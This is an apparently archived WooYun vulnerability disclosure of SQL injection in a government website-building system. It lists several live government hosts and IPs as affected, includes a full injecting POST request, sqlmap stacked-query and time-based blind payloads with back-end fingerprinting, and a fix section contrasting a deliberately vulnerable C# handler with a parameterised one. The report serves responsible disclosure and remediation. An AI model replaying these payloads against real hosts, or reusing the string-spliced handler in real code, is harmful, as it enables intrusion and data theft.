
Vulnerability summary

Defect ID: wooyun-2015-0103128

Title: SQL injection in a general-purpose government website-building system

Vendor: 南京擎天科技

Author: 路人甲

Submitted: 2015-03-24 15:12

Fixed: 2015-06-25 16:42

Published: 2015-06-25 16:42

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-03-24: Details sent to the vendor; awaiting the vendor's response
2015-03-27: Vendor confirmed; details disclosed to the vendor only
2015-03-30: Details opened to third-party security partners
2015-05-21: Details opened to core white hats and experts in the relevant field
2015-05-31: Details opened to regular white hats
2015-06-10: Details opened to intern white hats
2015-06-25: Details opened to the public

Brief description:

SQL injection in a general-purpose government website-building system (another instance)

Detailed description:

The government website-building system developed by 南京擎天科技 contains a SQL injection.
Affected instances:
http://61.178.185.50/lzweb/webpages/webusercaselist.aspx
http://qlgk.taixing.gov.cn/webpages/webusercaselist.aspx
http://58.222.216.220/ggweb/webpages/webusercaselist.aspx
http://58.222.211.21/webpages/webusercaselist.aspx
http://61.178.185.50/wwweb/webpages/webusercaselist.aspx
http://qlgk.jingjiang.gov.cn/webpages/webusercaselist.aspx

Proof of vulnerability:

The Key parameter in the POST body is injectable.
Tested against http://58.222.211.21/webpages/webusercaselist.aspx

POST /webpages/webusercaselist.aspx HTTP/1.1
Host: 58.222.211.21
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
DontTrackMeHere: gzip, deflate
Referer: http://58.222.211.21/webpages/webusercaselist.aspx
Cookie: webuserid=1; companyname=黄鹏
X-Forwarded-For: '
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 2496
__EVENTTARGET=Btn_Search&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=
%2FwEPDwULLTExOTA2NTQ1MjMPZBYCAgMPZBYGAgEPDxYEHglNYXhMZW5ndGgCCh4EVGV4dAUKMjAxNS0wMy0wMRY
YHghvbGRWYWx1ZQUKMjAxNS0wMy0wMR4IbGFuZ3VhZ2UFCmphdmFzY3JpcHQeBm9uYmx1cgUhdHJ5e19fdGltZV9i
bHVyKHRoaXMpO31jYXRjaChlKXt9HgdvbmtleXVwBSJ0cnl7X190aW1lX2tleXVwKHRoaXMpO31jYXRjaChlKXt9H
gdvbmNsaWNrBSJ0cnl7X190aW1lX2NsaWNrKHRoaXMpO31jYXRjaChlKXt9Hg1vbmNvbnRleHRtZW51BSh0cnl7X1
90aW1lX2NvbnRleHRtZW51KHRoaXMpO31jYXRjaChlKXt9HghvbmNoYW5nZQUjdHJ5e19fdGltZV9jaGFuZ2UodGh
pcyk7fWNhdGNoKGUpe30eCW9ua2V5ZG93bgUkdHJ5e19fdGltZV9rZXlkb3duKHRoaXMpO31jYXRjaChlKXt9Hgtv
bm1vdXNlbW92ZQUmdHJ5e19fdGltZV9tb3VzZW1vdmUodGhpcyk7fWNhdGNoKGUpe30eCm9ua2V5cHJlc3MFJXRye
XtfX3RpbWVfa2V5cHJlc3ModGhpcyk7fWNhdGNoKGUpe30eBXN0eWxlBXU7YmFja2dyb3VuZC1pbWFnZTp1cmwoJy
4uL2luYy9Ta3lEYXRlVGltZUN0cmxfbGliLmdpZicpO2JhY2tncm91bmQtcG9zaXRpb246cmlnaHQgY2VudGVyO2J
hY2tncm91bmQtcmVwZWF0Om5vLXJlcGVhdDseCXR4dF90eXBlcwUKeXl5eS1tbS1kZGQCAw8PFgQfAAIKHwEFCjIw
MTUtMDMtMjIWGB8CBQoyMDE1LTAzLTIyHwMFCmphdmFzY3JpcHQfBAUhdHJ5e19fdGltZV9ibHVyKHRoaXMpO31jY
XRjaChlKXt9HwUFInRyeXtfX3RpbWVfa2V5dXAodGhpcyk7fWNhdGNoKGUpe30fBgUidHJ5e19fdGltZV9jbGljay
h0aGlzKTt9Y2F0Y2goZSl7fR8HBSh0cnl7X190aW1lX2NvbnRleHRtZW51KHRoaXMpO31jYXRjaChlKXt9HwgFI3R
yeXtfX3RpbWVfY2hhbmdlKHRoaXMpO31jYXRjaChlKXt9HwkFJHRyeXtfX3RpbWVfa2V5ZG93bih0aGlzKTt9Y2F0
Y2goZSl7fR8KBSZ0cnl7X190aW1lX21vdXNlbW92ZSh0aGlzKTt9Y2F0Y2goZSl7fR8LBSV0cnl7X190aW1lX2tle
XByZXNzKHRoaXMpO31jYXRjaChlKXt9HwwFdTtiYWNrZ3JvdW5kLWltYWdlOnVybCgnLi4vaW5jL1NreURhdGVUaW
1lQ3RybF9saWIuZ2lmJyk7YmFja2dyb3VuZC1wb3NpdGlvbjpyaWdodCBjZW50ZXI7YmFja2dyb3VuZC1yZXBlYXQ
6bm8tcmVwZWF0Ox8NBQp5eXl5LW1tLWRkZAILDxQrAAsPFhAeC18hSXRlbUNvdW50Zh4IRGF0YUtleXMWAB4QQ3Vy
cmVudFBhZ2VJbmRleGYeCVBhZ2VDb3VudAIBHhVfIURhdGFTb3VyY2VJdGVtQ291bnRmHglJdGVtQ291bnRmHglQY
WdlSW5kZXhmHhBWaXJ0dWFsSXRlbUNvdW50Ag9kFCsAAzwrAAQBABYCHgpIZWFkZXJUZXh0BSs8Tk9CUj4mbmJzcD
vnlLPor7fkuovpobnlkI3np7AmbmJzcDs8L05PQlI%2BPCsABAEAFgIfFgUlPE5PQlI%2BJm5ic3A75o
%2BQ5Lqk5pe26Ze0Jm5ic3A7PC9OT0JSPjwrAAQBABYCHxYFJTxOT0JSPiZuYnNwO%2BS6i
%2BmhueeKtuaAgSZuYnNwOzwvTk9CUj4WBB4IQ3NzQ2xhc3MFCERHX1BhcGVyHgRfIVNCAgIWBB8XBQlER19IZWFk
ZXIfGAICFgQfFwUJREdfRm9vdGVyHxgCAhYEHxcFB0RHX0l0ZW0fGAICFgQfFwUIREdfQWx0ZXIfGAICZGQWBB8XB
QhER19UYWJsZR8YAgJkFgJmD2QWBGYPZBYCZg9kFgICDQ8QZGQWAGQCAw9kFgJmD2QWAgINDxBkZBYAZGQ52zQOb
%2BIXzg2C%2FYTrdYF35Ytgzw%3D%3D&__VIEWSTATEGENERATOR=6CA1BC1E&__EVENTVALIDATION=
%2FwEWBwKQzrSCBwKSiMWBDQLcnpxKAoKB9NcJAsukjhsChPitwg8C5JO45gIMNC92kClAgYvtAVfa
%2FWieTprTBw%3D%3D&Ctr_BeginTime=2015-03-01&Ctr_EndTime=2015-03-22&Key=%27


Place: POST
Parameter: Key
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __EVENTTARGET=Btn_Search&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=
/wEPDwULLTExOTA2NTQ1MjMPZBYCAgMPZBYGAgEPDxYEHglNYXhMZW5ndGgCCh4EVGV4dAUKMjAxNS0w
My0wMRYYHghvbGRWYWx1ZQUKMjAxNS0wMy0wMR4IbGFuZ3VhZ2UFCmphdmFzY3JpcHQeBm9uYmx1cgUh
dHJ5e19fdGltZV9ibHVyKHRoaXMpO31jYXRjaChlKXt9HgdvbmtleXVwBSJ0cnl7X190aW1lX2tleXVw
KHRoaXMpO31jYXRjaChlKXt9HgdvbmNsaWNrBSJ0cnl7X190aW1lX2NsaWNrKHRoaXMpO31jYXRjaChl
KXt9Hg1vbmNvbnRleHRtZW51BSh0cnl7X190aW1lX2NvbnRleHRtZW51KHRoaXMpO31jYXRjaChlKXt9
HghvbmNoYW5nZQUjdHJ5e19fdGltZV9jaGFuZ2UodGhpcyk7fWNhdGNoKGUpe30eCW9ua2V5ZG93bgUk
dHJ5e19fdGltZV9rZXlkb3duKHRoaXMpO31jYXRjaChlKXt9Hgtvbm1vdXNlbW92ZQUmdHJ5e19fdGlt
ZV9tb3VzZW1vdmUodGhpcyk7fWNhdGNoKGUpe30eCm9ua2V5cHJlc3MFJXRyeXtfX3RpbWVfa2V5cHJl
c3ModGhpcyk7fWNhdGNoKGUpe30eBXN0eWxlBXU7YmFja2dyb3VuZC1pbWFnZTp1cmwoJy4uL2luYy9T
a3lEYXRlVGltZUN0cmxfbGliLmdpZicpO2JhY2tncm91bmQtcG9zaXRpb246cmlnaHQgY2VudGVyO2Jh
Y2tncm91bmQtcmVwZWF0Om5vLXJlcGVhdDseCXR4dF90eXBlcwUKeXl5eS1tbS1kZGQCAw8PFgQfAAIK
HwEFCjIwMTUtMDMtMjIWGB8CBQoyMDE1LTAzLTIyHwMFCmphdmFzY3JpcHQfBAUhdHJ5e19fdGltZV9i
bHVyKHRoaXMpO31jYXRjaChlKXt9HwUFInRyeXtfX3RpbWVfa2V5dXAodGhpcyk7fWNhdGNoKGUpe30f
BgUidHJ5e19fdGltZV9jbGljayh0aGlzKTt9Y2F0Y2goZSl7fR8HBSh0cnl7X190aW1lX2NvbnRleHRt
ZW51KHRoaXMpO31jYXRjaChlKXt9HwgFI3RyeXtfX3RpbWVfY2hhbmdlKHRoaXMpO31jYXRjaChlKXt9
HwkFJHRyeXtfX3RpbWVfa2V5ZG93bih0aGlzKTt9Y2F0Y2goZSl7fR8KBSZ0cnl7X190aW1lX21vdXNl
bW92ZSh0aGlzKTt9Y2F0Y2goZSl7fR8LBSV0cnl7X190aW1lX2tleXByZXNzKHRoaXMpO31jYXRjaChl
KXt9HwwFdTtiYWNrZ3JvdW5kLWltYWdlOnVybCgnLi4vaW5jL1NreURhdGVUaW1lQ3RybF9saWIuZ2lm
Jyk7YmFja2dyb3VuZC1wb3NpdGlvbjpyaWdodCBjZW50ZXI7YmFja2dyb3VuZC1yZXBlYXQ6bm8tcmVw
ZWF0Ox8NBQp5eXl5LW1tLWRkZAILDxQrAAsPFhAeC18hSXRlbUNvdW50Zh4IRGF0YUtleXMWAB4QQ3Vy
cmVudFBhZ2VJbmRleGYeCVBhZ2VDb3VudAIBHhVfIURhdGFTb3VyY2VJdGVtQ291bnRmHglJdGVtQ291
bnRmHglQYWdlSW5kZXhmHhBWaXJ0dWFsSXRlbUNvdW50Ag9kFCsAAzwrAAQBABYCHgpIZWFkZXJUZXh0
BSs8Tk9CUj4mbmJzcDvnlLPor7fkuovpobnlkI3np7AmbmJzcDs8L05PQlI+PCsABAEAFgIfFgUlPE5P
QlI+Jm5ic3A75o+Q5Lqk5pe26Ze0Jm5ic3A7PC9OT0JSPjwrAAQBABYCHxYFJTxOT0JSPiZuYnNwO+S6
i+mhueeKtuaAgSZuYnNwOzwvTk9CUj4WBB4IQ3NzQ2xhc3MFCERHX1BhcGVyHgRfIVNCAgIWBB8XBQlE
R19IZWFkZXIfGAICFgQfFwUJREdfRm9vdGVyHxgCAhYEHxcFB0RHX0l0ZW0fGAICFgQfFwUIREdfQWx0
ZXIfGAICZGQWBB8XBQhER19UYWJsZR8YAgJkFgJmD2QWBGYPZBYCZg9kFgICDQ8QZGQWAGQCAw9kFgJm
D2QWAgINDxBkZBYAZGQ52zQOb+IXzg2C/YTrdYF35Ytgzw==&__VIEWSTATEGENERATOR=6CA1BC1E&_
_EVENTVALIDATION=/wEWBwKQzrSCBwKSiMWBDQLcnpxKAoKB9NcJAsukjhsChPitwg8C5JO45gIMNC9
2kClAgYvtAVfa/WieTprTBw==&Ctr_BeginTime=2015-03-01&Ctr_EndTime=2015-03-22&Key=')
; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __EVENTTARGET=Btn_Search&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=
/wEPDwULLTExOTA2NTQ1MjMPZBYCAgMPZBYGAgEPDxYEHglNYXhMZW5ndGgCCh4EVGV4dAUKMjAxNS0w
My0wMRYYHghvbGRWYWx1ZQUKMjAxNS0wMy0wMR4IbGFuZ3VhZ2UFCmphdmFzY3JpcHQeBm9uYmx1cgUh
dHJ5e19fdGltZV9ibHVyKHRoaXMpO31jYXRjaChlKXt9HgdvbmtleXVwBSJ0cnl7X190aW1lX2tleXVw
KHRoaXMpO31jYXRjaChlKXt9HgdvbmNsaWNrBSJ0cnl7X190aW1lX2NsaWNrKHRoaXMpO31jYXRjaChl
KXt9Hg1vbmNvbnRleHRtZW51BSh0cnl7X190aW1lX2NvbnRleHRtZW51KHRoaXMpO31jYXRjaChlKXt9
HghvbmNoYW5nZQUjdHJ5e19fdGltZV9jaGFuZ2UodGhpcyk7fWNhdGNoKGUpe30eCW9ua2V5ZG93bgUk
dHJ5e19fdGltZV9rZXlkb3duKHRoaXMpO31jYXRjaChlKXt9Hgtvbm1vdXNlbW92ZQUmdHJ5e19fdGlt
ZV9tb3VzZW1vdmUodGhpcyk7fWNhdGNoKGUpe30eCm9ua2V5cHJlc3MFJXRyeXtfX3RpbWVfa2V5cHJl
c3ModGhpcyk7fWNhdGNoKGUpe30eBXN0eWxlBXU7YmFja2dyb3VuZC1pbWFnZTp1cmwoJy4uL2luYy9T
a3lEYXRlVGltZUN0cmxfbGliLmdpZicpO2JhY2tncm91bmQtcG9zaXRpb246cmlnaHQgY2VudGVyO2Jh
Y2tncm91bmQtcmVwZWF0Om5vLXJlcGVhdDseCXR4dF90eXBlcwUKeXl5eS1tbS1kZGQCAw8PFgQfAAIK
HwEFCjIwMTUtMDMtMjIWGB8CBQoyMDE1LTAzLTIyHwMFCmphdmFzY3JpcHQfBAUhdHJ5e19fdGltZV9i
bHVyKHRoaXMpO31jYXRjaChlKXt9HwUFInRyeXtfX3RpbWVfa2V5dXAodGhpcyk7fWNhdGNoKGUpe30f
BgUidHJ5e19fdGltZV9jbGljayh0aGlzKTt9Y2F0Y2goZSl7fR8HBSh0cnl7X190aW1lX2NvbnRleHRt
ZW51KHRoaXMpO31jYXRjaChlKXt9HwgFI3RyeXtfX3RpbWVfY2hhbmdlKHRoaXMpO31jYXRjaChlKXt9
HwkFJHRyeXtfX3RpbWVfa2V5ZG93bih0aGlzKTt9Y2F0Y2goZSl7fR8KBSZ0cnl7X190aW1lX21vdXNl
bW92ZSh0aGlzKTt9Y2F0Y2goZSl7fR8LBSV0cnl7X190aW1lX2tleXByZXNzKHRoaXMpO31jYXRjaChl
KXt9HwwFdTtiYWNrZ3JvdW5kLWltYWdlOnVybCgnLi4vaW5jL1NreURhdGVUaW1lQ3RybF9saWIuZ2lm
Jyk7YmFja2dyb3VuZC1wb3NpdGlvbjpyaWdodCBjZW50ZXI7YmFja2dyb3VuZC1yZXBlYXQ6bm8tcmVw
ZWF0Ox8NBQp5eXl5LW1tLWRkZAILDxQrAAsPFhAeC18hSXRlbUNvdW50Zh4IRGF0YUtleXMWAB4QQ3Vy
cmVudFBhZ2VJbmRleGYeCVBhZ2VDb3VudAIBHhVfIURhdGFTb3VyY2VJdGVtQ291bnRmHglJdGVtQ291
bnRmHglQYWdlSW5kZXhmHhBWaXJ0dWFsSXRlbUNvdW50Ag9kFCsAAzwrAAQBABYCHgpIZWFkZXJUZXh0
BSs8Tk9CUj4mbmJzcDvnlLPor7fkuovpobnlkI3np7AmbmJzcDs8L05PQlI+PCsABAEAFgIfFgUlPE5P
QlI+Jm5ic3A75o+Q5Lqk5pe26Ze0Jm5ic3A7PC9OT0JSPjwrAAQBABYCHxYFJTxOT0JSPiZuYnNwO+S6
i+mhueeKtuaAgSZuYnNwOzwvTk9CUj4WBB4IQ3NzQ2xhc3MFCERHX1BhcGVyHgRfIVNCAgIWBB8XBQlE
R19IZWFkZXIfGAICFgQfFwUJREdfRm9vdGVyHxgCAhYEHxcFB0RHX0l0ZW0fGAICFgQfFwUIREdfQWx0
ZXIfGAICZGQWBB8XBQhER19UYWJsZR8YAgJkFgJmD2QWBGYPZBYCZg9kFgICDQ8QZGQWAGQCAw9kFgJm
D2QWAgINDxBkZBYAZGQ52zQOb+IXzg2C/YTrdYF35Ytgzw==&__VIEWSTATEGENERATOR=6CA1BC1E&_
_EVENTVALIDATION=/wEWBwKQzrSCBwKSiMWBDQLcnpxKAoKB9NcJAsukjhsChPitwg8C5JO45gIMNC9
2kClAgYvtAVfa/WieTprTBw==&Ctr_BeginTime=2015-03-01&Ctr_EndTime=2015-03-22&Key=')
WAITFOR DELAY '0:0:5'--
---
[00:11:46] [INFO] testing Microsoft SQL Server
[00:11:46] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
[00:12:14] [INFO] confirming Microsoft SQL Server
[00:12:24] [INFO] adjusting time delay to 1 second due to good response times
[00:13:38] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[00:13:38] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 814 times
[00:13:38] [INFO] fetched data logged to text files under 'D:\python\sqlmap\outp
ut\58.222.211.21'
[*] shutting down at 00:13:38

Fix recommendation:

As the title says.
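The report gives no code for the affected page, so the following is an added example, not the vendor's own source: an ASP.NET Web Forms search handler written first in the string-splicing style that lets a stacked `WAITFOR DELAY` through the Key field, then the parameterised form that closes the hole. The form field names Key, Ctr_BeginTime, Ctr_EndTime and Btn_Search are taken from the request above and are assumed to map to server controls of the same name; the table dbo.UserCase, its columns CaseName and SubmitTime, the connection-string name "lzweb" and the GridView1 control are hypothetical.

```csharp
// Added example (not code from the vendor's product). Assumed names:
// dbo.UserCase(CaseName, SubmitTime), connection string "lzweb", GridView1.
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web.UI;

public partial class WebUserCaseList : Page
{
    private static readonly string ConnStr =
        ConfigurationManager.ConnectionStrings["lzweb"].ConnectionString;

    // BEFORE (the pattern the report implies): the keyword and both dates are
    // spliced into the SQL text. A Key value such as  ') ; WAITFOR DELAY '0:0:5'--
    // closes the LIKE literal and the parenthesis, terminates the statement and
    // appends a second one; SQL Server executes both, which is exactly the
    // "stacked queries" finding in the sqlmap output.
    private DataTable SearchVulnerable(string key, string begin, string end)
    {
        string sql = "SELECT CaseName, SubmitTime FROM dbo.UserCase " +
                     "WHERE (CaseName LIKE '%" + key + "%') " +
                     "AND SubmitTime BETWEEN '" + begin + "' AND '" + end + "'";
        using (var conn = new SqlConnection(ConnStr))
        using (var da = new SqlDataAdapter(sql, conn))
        {
            var dt = new DataTable();
            da.Fill(dt);
            return dt;
        }
    }

    // AFTER: the statement text is fixed at compile time and every user value
    // travels as a typed parameter, so the keyword can only be compared, never
    // parsed as T-SQL. Dates are validated server-side so a malformed value is
    // rejected here instead of reaching the DBMS as text.
    private DataTable SearchSafe(string key, string begin, string end)
    {
        DateTime beginDate, endDate;
        if (!DateTime.TryParse(begin, out beginDate) || !DateTime.TryParse(end, out endDate))
            throw new ArgumentException("invalid date range");

        const string sql = "SELECT CaseName, SubmitTime FROM dbo.UserCase " +
                           "WHERE CaseName LIKE @pattern " +
                           "AND SubmitTime BETWEEN @begin AND @end";
        using (var conn = new SqlConnection(ConnStr))
        using (var cmd = new SqlCommand(sql, conn))
        {
            // Neutralise LIKE wildcards so the user cannot turn '%', '_' or '['
            // into a match-everything pattern; the wrapping '%' is added once, here.
            string escaped = key.Replace("[", "[[]").Replace("%", "[%]").Replace("_", "[_]");
            cmd.Parameters.Add("@pattern", SqlDbType.NVarChar, 200).Value = "%" + escaped + "%";
            cmd.Parameters.Add("@begin", SqlDbType.DateTime).Value = beginDate;
            cmd.Parameters.Add("@end", SqlDbType.DateTime).Value = endDate;
            using (var da = new SqlDataAdapter(cmd))
            {
                var dt = new DataTable();
                da.Fill(dt);
                return dt;
            }
        }
    }

    // Btn_Search is the __EVENTTARGET in the captured request.
    protected void Btn_Search_Click(object sender, EventArgs e)
    {
        GridView1.DataSource = SearchSafe(Key.Text, Ctr_BeginTime.Text, Ctr_EndTime.Text);
        GridView1.DataBind();
    }
}
```

With SearchSafe in place the same `')` probe is simply searched for as a literal substring and returns no rows instead of a five-second stall, and the 814 HTTP 500 responses sqlmap recorded disappear because no malformed statement ever reaches SQL Server. Running the site's database login with read-only rights on the relevant tables limits what any remaining injection point could do.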

Copyright notice: when reproducing, credit the source as 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 13

Confirmed: 2015-03-27 16:42

Vendor reply:

CNVD has confirmed and reproduced the described issue; it has been forwarded through CNCERT to the Jiangsu branch, which will coordinate handling with the unit operating the websites.

Latest status:

None yet